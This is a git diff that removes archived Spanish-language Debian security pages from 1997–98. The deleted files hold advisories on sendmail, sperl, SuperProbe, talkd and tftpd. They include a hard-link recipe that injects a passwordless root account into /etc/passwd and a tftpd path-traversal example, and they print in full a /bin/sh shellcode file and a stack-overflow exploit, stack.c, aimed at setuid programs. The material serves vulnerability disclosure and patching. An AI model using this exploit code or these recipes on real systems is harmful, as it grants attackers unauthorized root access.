Enero de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/sendmail-dead-letter.html b/spanish/security/info/sendmail-dead-letter.html deleted file mode 100644 index 6487cc5ecfc..00000000000 --- a/spanish/security/info/sendmail-dead-letter.html +++ /dev/null @@ -1,79 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> -<blockquote> -<b>Fecha: Martes, 25 Mar 1997 09:57:47 +0100</b> <br> -<b>Desde: Claude Scarpelli <claude@INFOBIOGEN.FR></b> <p> - -<pre> -En un correo de fecha 24 de Marzo, bygranz@RS6000.CMP.ILSTU.EDU (Gonzo Granzeau) escribió: -> Jeffrey Moyer una vez parió ésto: -> > En Sabado, 22 Mar 1997 C0WZ1LL4@NETSPACE.ORG escribió: -> > -> > > Hola mongolines -> > > Probad ésto: -> > > Lincar (hard link) /etc/passwd a /var/tmp/dead.letter -> > > Telnet al port 25, mandad correo a alguna cuenta inexistente a algún -> > > servidor sin conexión. -> > > Mira tu mensaje pegado a /etc/passwd: -> > > ej: -> > > cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh -> de acuerdo, solo quiero apuntar algunas cosas relativas a ésta vulneración ... - -> ésto no funcionará en equipos gordos que se hallen particionados ya que -> sólamente se puede hacer un lincado "duro" en el mismo sistema de ficheros. -> Otro tema es que cualquier equipo que tenga definido "MAILER-DAEMON" recibirá -> cualquier correo allí. -</pre> - -A veces, sendmail no puede mandar correo a MAILER-DAEMON. En tal caso, -el mensaje se guarda en /var/tmp/dead.letter. <p> - -He observado que sucede en la siguiente configuración: - -<ol> -<li> sendmail en el mejor servidor MX se halla configurado para rechazar correos mayores de x bytes. - - -<li> sendmail en un servidor MX de menor prioridad se halla configurado cono un cliente nulo (FEATURE(nullclient)), pero sin límite de tamaño. - -<li> un correo muy grande (mayor de x bytes) llega al servidor donde sendmail se halla configurado como cliente nulo (el host MX de menor prioridad). <p> - -<b>Lo que entonces sucede es:</b> - -<li> el cliente nulo intenta pasar el correo al mejor MX, el cual lo rechaza (al ser mayor de x bytes) - -<li> Luego el cliente nulo trata de devolver el correo al que lo mandó. Ya que se trata de un cliente nulo, envía el mensaje al mejor servidor MX. - -<li> Pero el mejor servidor MX rechaza el correo (mayor de x bytes). Así que -el cliente nulo intenta mandar una notificación a MAILER-DAEMON. Ya que éste es -un cliente nulo, manda ése correo al mejor servidor MX, el cual lo rechaza (mayor de x bytes). -Este es una caso en el que sendmail escribirá a /var/tmp/dead.letter. - -</ol> -Pueden existir otras maneras de que sendmail escriba en /var/tmp/dead.letter. -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/shellcode.s b/spanish/security/info/shellcode.s deleted file mode 100644 index 104b7bbe777..00000000000 --- a/spanish/security/info/shellcode.s +++ /dev/null @@ -1,37 +0,0 @@ -.text -.globl shellcode -shellcode: -xorl %eax,%eax -movb $0x31,%al -int $0x80 -xchgl %eax,%ebx -xorl %eax,%eax -movb $0x17,%al -int $0x80 -.byte 0x68 -popl %ecx -popl %eax -jmp *%ecx -call *%esp -xorl %eax,%eax -cltd -movl %ecx,%edi -movb $'/'-1,%al -incl %eax -scasb %es:(%edi),%al -jne -3 -movl %edi,(%ecx) -movl %edx,4(%ecx) -movl %edi,%ebx -incl %eax -scasb %es:(%edi),%al -jne -3 -movb %dl,-1(%edi) -movb $0x0B,%al -int $0x80 -xorl %eax,%eax -incl %eax -xorl %ebx,%ebx -int $0x80 -.byte '/' -.string "/bin/sh0" diff --git a/spanish/security/info/sperl-5.003.html b/spanish/security/info/sperl-5.003.html deleted file mode 100644 index 29ae353e559..00000000000 --- a/spanish/security/info/sperl-5.003.html +++ /dev/null @@ -1,45 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Jue, 17 Abr 1997 14:11:09 -0700</b><br> -<b>From: Murphy <jtmurphy@cray1.ecst.csuchico.edu></b><p> - -Vino a mi atención el hecho de que hay un error de desbordamiento de buffer en -sperl5.003 que permite a usuarios locales adquirir privilegios de root, si hacen SUID root. -El programa de vulneracion y el error lo hizo y llevó a mi atención -<a href="mailto:tarreau@aemiaif.ibp.fr">Willy Tarreau</a>. <p> - -<a href="sperlexp.tgz">Junto</a> viene el fuente del programa de vulneración. -Ya que hay que hacer algunas cosas al programa ya compilado (Quitar 5 bytes del principio y del final del binario), el precompilado para Linux x86 puede encontrarse -<a href="http://www.ecst.csuchico.edu/~jtmurphy/localusers.html">aquí</a>. <p> - -PS. Tengan un buen día. -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/sperlexp.tgz b/spanish/security/info/sperlexp.tgz Binary files differdeleted file mode 100644 index 186277fc875..00000000000 --- a/spanish/security/info/sperlexp.tgz +++ /dev/null diff --git a/spanish/security/info/stack.c b/spanish/security/info/stack.c deleted file mode 100644 index 49eeaa78667..00000000000 --- a/spanish/security/info/stack.c +++ /dev/null @@ -1,97 +0,0 @@ -/* this stack overflow exploit code was written by jsn <jason@redline.ru> */ -/* provided "as is" and without any warranty. Sun Feb 9 08:12:54 MSK 1997 */ -/* usage: argv[0] their_stack_offset buffer_size target_program [params] */ -/* generated string will be appended to the last of params. */ - -/* examples: stack -600 1303 /usr/bin/lpr "-J" */ -/* stack -640 153 /usr/bin/minicom -t vt100 -d "" */ - -#include <stdlib.h> -#include <unistd.h> -#include <stdio.h> -#include <string.h> -#include <stdarg.h> - -#define NOP 0x90 - -const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n"; - -extern code(); -void dummy( void ) -{ - extern lbl(); - - /* do "exec( "/bin/sh" ); exit(0)" */ - -__asm__( " -code: xorl %edx, %edx - pushl %edx - jmp lbl -start2: movl %esp, %ecx - popl %ebx - movb %edx, 0x7(%ebx) - xorl %eax, %eax - movb $0xB, %eax - int $0x80 - xorl %ebx, %ebx - xorl %eax, %eax - inc %eax - int $0x80 -lbl: call start2 - .string \"/bin/sh\" - "); -} - -void Fatal( int rv, const char *fmt, ... ) -{ - va_list vl; - va_start( vl, fmt ); - vfprintf( stderr, fmt, vl ); - va_end( vl ); - exit( rv ); -} - -int main( int ac, char **av ) -{ - int buff_addr; /* where our code is */ - int stack_offset = 0, - buffer_size = 0, i, code_size; - char *buffer, *p; - - buff_addr = (int)(&buff_addr); /* get the stack pointer */ - code_size = strlen( (char *)code ); /* get the size of piece of */ - /* code in dummy() */ - if( ac < 5 ) Fatal( -1, usage, *av ); - - buff_addr -= strtol( av[ 1 ], NULL, 0 ); - buffer_size = strtoul( av[ 2 ], NULL, 0 ); - - if( buffer_size < code_size + 4 ) - Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5); - /* "this is supported, but not implemented yet" ;) */ - - if( (buffer = malloc( buffer_size )) == NULL ) - Fatal( -1, "malloc(): %s\n", strerror( errno ) ); - - fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr ); - - for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 ) - *(int *)(buffer + i) = buff_addr; - memset( buffer, NOP, buffer_size/2 ); - - i = (buffer_size - code_size - 4)/2; - - memcpy( buffer + i, (char *)code, code_size ); - buffer[ buffer_size - 1 ] = '\0'; - - p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 ); - if( !p ) - Fatal( -1, "malloc(): %s\n", strerror( errno ) ); - - strcpy( p, av[ ac - 1 ] ); - strcat( p, buffer ); - av[ ac - 1 ] = p; - - execve( av[ 3 ], av + 3, NULL ); - perror( "exec():" ); -} diff --git a/spanish/security/info/superprobe.html b/spanish/security/info/superprobe.html deleted file mode 100644 index 9bb23863b9f..00000000000 --- a/spanish/security/info/superprobe.html +++ /dev/null @@ -1,87 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Martes, 4 Mar 1997 23:24:28 -0500</b> <br> -<b>Desde: solar@IDEAL.RU</b> <p> - -Hola! <p> - -SuperProbe es un programa que viene con XFree86 para determinar el tipo de placa de video instalada, y se instala en muchas distribuciones Linux con el setuid root (convertirse en root mientras se ejecuta el proceso). Se ha discutido aquí en otras ocasiones que adolecía de desbordamientos de búfer, pero aparentemente aún no existía ninguna vulneración. La razón de ello pudiera ser que ésta vulneración se daba de forma algo poco usual. -Esta es la razón por la cual me he decidido a publicar la vulneración, como un ejemplo de aprovechar el desbordamiento sin tener que bregar con la dirección devuelta. <p> - -El desbordamiento que estoy explotando se halla en la función TestChip: <p> - - -<pre> - static Bool TestChip(chip_p, Chipset) - Chip_Descriptor *chip_p; - int *Chipset; - { - char *p, *p1, name[64]; - - [...] - - (void)strcpy(name, p); - } - if (StrCaseCmp(name, chip_p->name) == 0) - - [...] - - if (chip_p->f(Chipset)) - { - return(TRUE); - } - return(FALSE); - } - -</pre> - -Chip_Descriptor se define como sigue: <p> - -<pre> - typedef Bool (*ProbeFunc) __STDCARGS((int *)); - -[...] - - typedef struct { - char *name; /* Chipset vendor/class name */ - ProbeFunc f; /* Probe function */ -[...] - } Chip_Descriptor; -</pre> - - -Es posible sobreescribir la dirección de vuelta mediante el strcpy, pero un byte de chip_p podría verse inicializado a cero (ya que chip_p se halla colocado justo después de la dirección de retorno, y la cadena es ASCIIZ). Esto podría hacer que el programa cascase al acceder a chip_p->name para pasarlo a StrCaseCmp, antes de utilizar la dirección de retorno. <p> - -Poe ése motivo escribí de nuevo chip_p para que apuntase a una variable de entorno (vale, la dirección de retorno queda reescrita, pero no se utiliza nunca), que contiene una tabla de punteros (localizado al final del valor de la misma variable). -Uno de ellos es usado al principio por StrCaseCmp, luego no casca, y el siguiente se utiliza como el apuntador a la funció probe, luego el código de shellcode se ejecuta al lamar a chip_p->f() (Puede ser necesario ajustar el alineamiento en mi programa de vulneración, pruebe valores entre 0 y 3 si el de por defecto no funciona). <p> - -<a href="probe.c">probe.c</a> -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/talkd.html b/spanish/security/info/talkd.html deleted file mode 100644 index 595255d383f..00000000000 --- a/spanish/security/info/talkd.html +++ /dev/null @@ -1,207 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.04.talkd">CERT-Consultoria</a> <p> - -El Centro de Coordinación del CERT ha recibido noticias acerca de la vulnerabilidad existente en el programa talkd(8) utilizado por talk(1). -Construyendo de determinada manera datos DNS, un intruso puede ejecutar remotamento comandos con privilegios de root. <p> - -Un fichero de comandos de "exploit" ha sido puesto a disposición del público en general, y hemos recibido noticias de acceso con éxito a recursos de root mediante la utilización de éste fichero. <p> - -Debe tener precaución de otros avisos publicados por otros equipos relacionados con éste problema. Tenga en cuenta que éstas notificaciones contienen material adicional y cubren otros aspectos de las vulnerabilidades sufridas por un conjunto más amplio de problemas, de los cuales éste es sólo una muestra. <p> - -El equipo del CERT/CC recomienda seguir los pasos necesarios para resolver éste problema (Sección III.A) e instalar un parche del proveedor relativo a ésta particularidad (Sec III.B). Hasta que Vd. pueda instalar éste parche, le aconsejamos encarecidamente que deshabilite el/los programas talkd en su instalación. <p> - - -Actualizaremos éstas notificaciones tan pronto como recibamos información adicional. Por favor, chequee con regularidad los ficheros de notificación por si hubiera actualizaciones relativas a su instalación. - -<hr> - -<ol> -<li><b> Descripción</b> <p> - - El Centro de Coordinación del CERT ha recibido información acerca de vulnerabilidad en el programa talkd(8) utilizado por talk(1) - Talk es un programa de comunicaciones que copia texto desde un terminal de usuario a otro, posíblemente remoto. Talkd es el "demonio" que notifica a un usuario que alguien desea iniciar una conversación talk. <p> - - Como parte de una conexión de "talk", talkd efectúa una búsqueda DNS del nombre del servidor desde donde se inicia la conexión. Debido a que hay un insuficiente control de los límites del buffer donde se almacena ése nombre, es posible reescribir el espacio del pila interno de talkd.<p> -Es posible forzar a talkd a ejecutar cualquier comando manipulando cuidadosamente la información del nombre del servidor. Ya que talkd se ejecuta con privilegios de root, ello permite que intrusos puedan ejecutar remotamente comandos con ésos privilegios. <p> - - - Este ataque necesita que el intruso sea capaz de efectuar una conexión de red a un programa talkd vulnerable y que éste suministre al equipo remoto información DNS corrompida. <p> - - Este tipo de ataque es uno de los componentes del problema que se describe en la notificación CERT CA-96.04 "Información corrupta desde Servidores de Red,", disponible en <a href="ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers">ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers</a> <p> - - Aquellos sitios que utilicen BIND 4.9.4 Patch Level 1 ó superior NO son vulnerables a ataques basados en servidor/desbordamiento de memoria relativa a dirección IP (incluyendo éste problema específico). <p> - - - - Sea consciente de que existen distintas versiones del programa talkd. Dependiendo de su sistema, el programa puede teber uno de los siguientes nombres: talkd, otalkd, ntalkd. <p> - - Para determinar si su instalación permite sesiones de talk, compruebe /etc/inetd.conf: <p> - -<pre> - # grep -i "^[a-z]*talk" /etc/inetd.conf -</pre> - -<b>Nota:</b> Un fichero de comandos de "exploit" ha sido puesto a disposición del público en general. El CERT/CC ha recibido noticias de acceso con éxito a recursos de root mediante la utilización de éste fichero. <p> - -<li><b> Impacto</b> <p> - - Los intrusos pueden ser capaces de ejecutar diversos comandos bajo privilegios de root. No necesitan tener acceso a una cuenta del sistema para aprovechar ésta vulnerabilidad. - -<li><b> Solución</b> <p> - - Existen varias opciones disponibles para atajar éste problema. Nosotros recomendamos que todas la instalaciones se prevengan contra el problema general (Sec. A) y además instalen un parche del proveedor (Sec. 8). Hasta que pueda instalar el parche, le aconsejamos encarecidamente que deshabilite el programa talkd en su instalación (Sec C). <p>. - - Tenga en cuenta que deshabilitando el programa talkd se verá protegido conta el ataque particular descrito en ésta notificación, pero no contra los ataques en general basados en red que manipulan la información nombre_del_servidor/dirección_ip para aprovechar una determinada vulnerabilidad. <p> - - <ol> - <li> Protección ante un problema en general <p> - - En el caso general, el problema descrito en ésta notificación es uno donde el agresor utiliza datos de servidor/dirección ip para aprovechar una vulerabilidad. El fichero de comandos antes mencionado usa el caso específico de ataques con DNS, pero los agresors pueden usar otros métodos de resolución servidor/dirección ip, tales como NIS, el fichero /etc/hosts y demás. <p> - - Si se siguen las siguientes medidas para todas las técnicas de transformación servidor/dirección, entonces su instlación no sólamente será inmune a ésta vulnerabilidad del talkd, sino además para toda la casuística general de ataques basados en desbordamientos de servidor/dirección ip. <p> - - - <ol> - <li> Ataques basados en DNS <p> - - Para defenderse de un ataque basado en DNS, le rogamos encarecidamente que se actualice a BIND 4.9.4 Patchlevel 1 ó superior (o el equivalente de su proveedor). La razón estriba en que BIND 4.9.4 Patchlevel 1 se halla adecuado al RFC (RFC 952) en la definición de la sintaxis para nombres de servidor (descrita en la notificación CERT CA-96.04,"Información corrupta en Servidores de Red"). <p> - - Tenga en cuenta que una actualización a 4.9.5 puede precisar una actualización de sendmail debido a las extensiones POSIX de la más reciente versión de BIND (descrita en CA-96.04). Para la última versión disponible de sendmail, consulte el fichero - <a href="ftp://info.cert.org/pub/latest_sw_versions/sendmail">ftp://info.cert.org/pub/latest_sw_versions/sendmail</a> <p> - - <li> Otros Servicios de Información de Redes <p> - - Para aquellos sistemas basados en técnicas adicionales de transformación nombre/dirección (tales como NIS, netinfo y ficheros planos como /etc/hosts), puede ser insuficiente usar la versión recomendada de BIND, puesto que las búsquedas DNS -y, por ende, la validación nombre servidor/validación de la dirección IP- pueden ser modificadas para hacer uso de las demás técnicas (NIS, netinfo, etc). -Por tanto, animamos a los proveedores y a los usuarios a incluir en el conjunto de utilidades de resolución el mismo código utilizado por BIND para validar nombres de servidor y direcciones IP. Este código se describe en la siguiente sección. <p> - - - <li> Código "casero" o "a la mano" <p> - - Utilice las subrutinas de validación de servidor y dirección IP disponiobles en las direcciones abajo expuestas. Inclúyalas en todos aquellos programas que utilicen el resultado de las búsquedas de nombre de servidor. <p> - - <a href="ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c">ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c</a> <br> - <a href="ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c">ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c</a> <p> - - El fichero IsValid.c contiene código para las subrutinas IsValidHostname y IsValidIPAddress. Este código puede utilizarse para comprobar nombres válidos de servidor y direcciones IP de acuerdo a las RFCs 952 y 1123, así como nombres conteniendo caracteres tomados de la práctica tales como "_" y "/". <p> - - - Los siguientes ficheros se hallan en el directorio (extraído del fichero README): - - <pre> - IsValid.l El fichero lex/flex que contiene el código para - IsValidHostname y IsValidIPAddress - MD5 (IsValid.l) = 2d35040aacae4fb12906eb1b48957776 - - IsValid-raw.c El fuente C creado mediante la ejecución de flex - sobre IsValid.l - MD5 (IsValid-raw.c) = 367c77d3ef84bc63a5c23d90eeb69330 - - IsValid.c El fichero creado mediante la concentración de - variables y definición de funciones de - IsValid-raw.c - MD5 (IsValid.c) = ffe45f1256210aeb71691f4f7cdad27f - - IsValid.diffs El fichero de diff entre IsValid-raw.c - e IsValid.c - MD5 (IsValid.diffs) = 3619022cf31d735151f8e8c83cce3744 - - htest.c Rutina main para comprobar IsValidHostname - y IsValidIPAddress - MD5 (htest.c) = 2d50b2bffb537cc4e637dd1f07a187f4 - </pre> - </ol> - - <li> Instalación de un parche de su proveedor <p> - - Abajo se detalla una lista de aquellos proveedores que han suministrado información. Los detalles se hallan en el Apéndice A de ésta notificación; iremos actualizando el apéndice a medida de ir recibiendo más información. - - Si su proveedor no se halla en ésta lista, será por no haber recibido información de él. Por favor, contacte directamente con él. - - Berkeley Software Design, Inc. (BSDI) - Cisco Systems - Data General Corporation - FreeBSD, Inc. - Hewlett-Packard Company - IBM Corporation - Linux - NEC Corporation - The Santa Cruz Operation, Inc. (SCO) - Silicon Graphics Inc. (SGI) - Solbourne (Grumman System Support) - Sun Microsystems, Inc. - - <li> Deshabilite el/los programa(s) talkd <p> - - Hasta el momento en el cual Vd. pueda instalar un parche de su proveedor, deshabilite cualquier programa talkd existente el /etc/inetd.conf bien comentando ésas líneas y relanzando inetd. - - Ejemplo de comandos (ejecutados desde root): - - # grep -i talk /etc/inetd.conf - talk dgram udp wait root /usr/etc/in.talkd in.talkd - - Comentar *todas* las referencias a talkd, otalkd o ntalkd. - (Los comentarios en /etc/inetd.conf comienzan por "#".) - - Tras editar /etc/inetd.conf, relance inetd. En varios equipos Unix, se lleva a cabo mandando una señal HUP al proceso inetd. - - - Para SYSV: - - # ps -ef | grep inetd | grep -v grep - # kill -HUP {inetd PID} - - Para BSD: - - # ps -aux | grep inetd | grep -v grep - # kill -HUP {inetd PID} - - Tenga en cuenta que deshabilitar talkd le solucionará sólamente el problema al que hacemos mencion; sin embargo, no cubrirá el problema general de ataques sobre red que manipulan información de nombres de servidor/direcciones IP para aprovechar una vulnerabilidad. - </ol> -</ol> - -<hr> - -<h3>Apéndice A - Información de Proveedores.</h3> - -A continuación se detalla una lista de todos los proveedores que han mandado información para ésta notificación. Actualizaremos éste apéndice según vayamos recibiendo más información. Si no ve a su proveedor reflejado aquí, por favor contacte directamente con él. <p> - -<b>Linux</b> <p> - - Este error fué corregido en Linux NetKit 0.08, que se entrega con todas las distribuciones medianamente actualizadas. - Los usuarios de Linux que usen NetKit 0.07 ó anterior deben actualizarlo a la versión 0.09. Esta versión ha corregido otros errores y por tanto se recomienda encarecidamente a aquellos a actualizarse dicha versión. - Se halla disponible en: - <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz"></a> <p> - - Algunos proveedores han optado por dotar a NetKit 0.08 de nuevas correcciones en vez de la 0.09. Consulte a su proveedor para una información más detallada. <p> - La comunidad Linux le gustaría agradecer a David A. Holland por su constante trabajo sobre la seguridad en redes Linux. <p> - - -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1.998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/tftpd.html b/spanish/security/info/tftpd.html deleted file mode 100644 index 9a5df6292dd..00000000000 --- a/spanish/security/info/tftpd.html +++ /dev/null @@ -1,111 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Domingo 23 de Marzo 1997 09:11:34 -0800 (PST)</b> <br> -<b>Desde: Alex Belits <abelits@phobos.illtel.denver.co.us></b> <p> - -[Mod: mensaje de David Holland's message añadido al final, linux-alert añadido a la lista de direcciones -- alex] <p> - -El Sábado 22 Mar 1997, Ben Cantrick escribió: - -<em> -Es una bonita trampa, y parece que funciona. Pero estoy convencido de que alguien ha visto la necesidad y ha hecho ésto anteriormente. Mis repetidas incursiones en la red desde varios buscadores no han conseguido nada relevante, por lo que estoy intrigado si alguien en la lista conoce (o mejor, tiene) código fuente que sea libremente distribuible para un tftpd "seguro".<p> -</em> - - En la distribución FreeBSD, tftpd utiliza chroot() y fija su identificador de usuario (uid) a "nobody" -No creo que haga nada relativo a grupos.. <p> - -Pero... he mirado en el tftpd de Linux (NetKit 0.09) y de FreeBSD (2.2-ALPHA) - y he encontrado un código realmente extraño dentro del de Linux, en la función validate_access: <p> - -<pre> - syslog(LOG_ERR, "tftpd: trying to get file: %s\n", filename); - - if (*filename != '/') { - syslog(LOG_ERR, "tftpd: serving file from %s\n", dirs[0]); - chdir(dirs[0]); - } else { - for (dirp = dirs; *dirp; dirp++) - if (strncmp(filename, *dirp, strlen(*dirp)) == 0) - break; - if (*dirp==0 && dirp!=dirs) - return (EACCESS); - } - /* - * prevent tricksters from getting around the directory restrictions - */ - for (cp = filename + 1; *cp; cp++) - if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0) - return(EACCESS); -</pre> - -...chequea _solamente_ el nombre del fichero contra "/../" y comienza _siempre_ desde la segunda letra del nombre del fichero (en otras palabras, si el nombre del fichero viene vacío, "analiza" la memoria tras él, donde habrá lo que haya metido otra parte del código; por lo menos no hará nada destructivo). -Pero además asume que todos los nombres de fichero que no empiezan con '/' son relativos a algún directorio, y nunca los chequea contra "../", como el de FreeBSD hace. Luego: (vea el código que sigue con los caminos que muestra la llamada a syslog()): <p> - -<pre> -Mar 23 06:55:08 phobos in.tftpd[9799]: connect from phobos.illtel.denver.co.us -Mar 23 06:55:08 phobos tftpd[9800]: tftpd: trying to get file: ../etc/passwd -Mar 23 06:55:08 phobos tftpd[9800]: tftpd: serving file from /tftpboot -</pre> - -...y obviamente se trataba de /tftpboot/../etc/passwd, o sea, /etc/passwd. <p> - -No hace ningún daño en sí mismo, pero efectivamente no se pensaba que podría hacer eso. El tftpd de FreeBSD no autorizaba a hacer esas cosas. <p> - -De acuerdo con reseñas de copyright, los dos tftpd se derivaron de antiguo código de Berkeley (1983), y el de Linux tiene irregularidades en general sobre su sódigo ( y el directorio por defecto /tftpboot no existió hasta la 0.09; la 0.08 parece ser que necesita la lista de directorios ó sencillamente saldría por SIGSEV ó "NULL pointer" ). <p> - -El tftpd de FreeBSD se compila mediante éste comando: <p> -<pre> - gcc -O -DLOG_FTP=LOG_DAEMON -o tftpd tftpd.c tftpsubs.c -</pre> - -y funciona bien si se añade -ls /tftpboot como opción en la línea de comandos. -Si no, sólamente chequea permisos de fichero sin siquiera intentar convertirse en "nobody" y ello abre un agujero para directorios que no son ejecutables -(aun siendo el directorio no ejecutable para nadie salvo para root, los ficheros en él contenidos son accesibles). -Además es necesario lincar /dev/log bajo el directorio chroot para mantener las trazas (logging) en funcionamiento. <p> - - -P.S. Cómo semejante ... obviamente, código inseguro pudo colarse dentro de tftpd en primer lugar, después de todas las revisiones que fueron hechas efectivamente para aumentar la seguridad? Después de todo, los cambios entre versiones NetKit _si_ tienen sentido. <p> - -<b>Return-Path: dholland@hcs.harvard.edu</b> <p> - -<pre> - [código fuente de tftpd mapeado a /dev/null] - Finalmente, previene de usar ".." y "." en el nombre de fichero que se utiliza: -</pre> - -Es correcto; no bloquea los ".." cuando van delante en el caso que el nombre del fichero no empiece con "/". <p> - -Alguien ya se percató de ésto y el arreglo irá en la siguiente versión; mientras, aquí hay un parche. <p> - -Necesita una fuerte recodificación. No te quedes sin aliento... :( <p> - -<a href="tftpd.patch">Aquí</a> está el parche. -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1.998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/tftpd.patch b/spanish/security/info/tftpd.patch deleted file mode 100644 index 2c1597c9174..00000000000 --- a/spanish/security/info/tftpd.patch +++ /dev/null @@ -1,25 +0,0 @@ -*** tftpd.c 1996/12/29 18:42:40 1.8 ---- tftpd.c 1997/03/08 11:31:00 -*************** -*** 40,44 **** - */ - char rcsid[] = -! "$Id$"; - - /* ---- 40,44 ---- - */ - char rcsid[] = -! "$Id$"; - - /* -*************** -*** 298,301 **** ---- 298,303 ---- - * prevent tricksters from getting around the directory restrictions - */ -+ if (!strncmp(filename, "../", 3)) -+ return EACCESS; - for (cp = filename + 1; *cp; cp++) - if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0) - diff --git a/spanish/security/info/xfree3.html 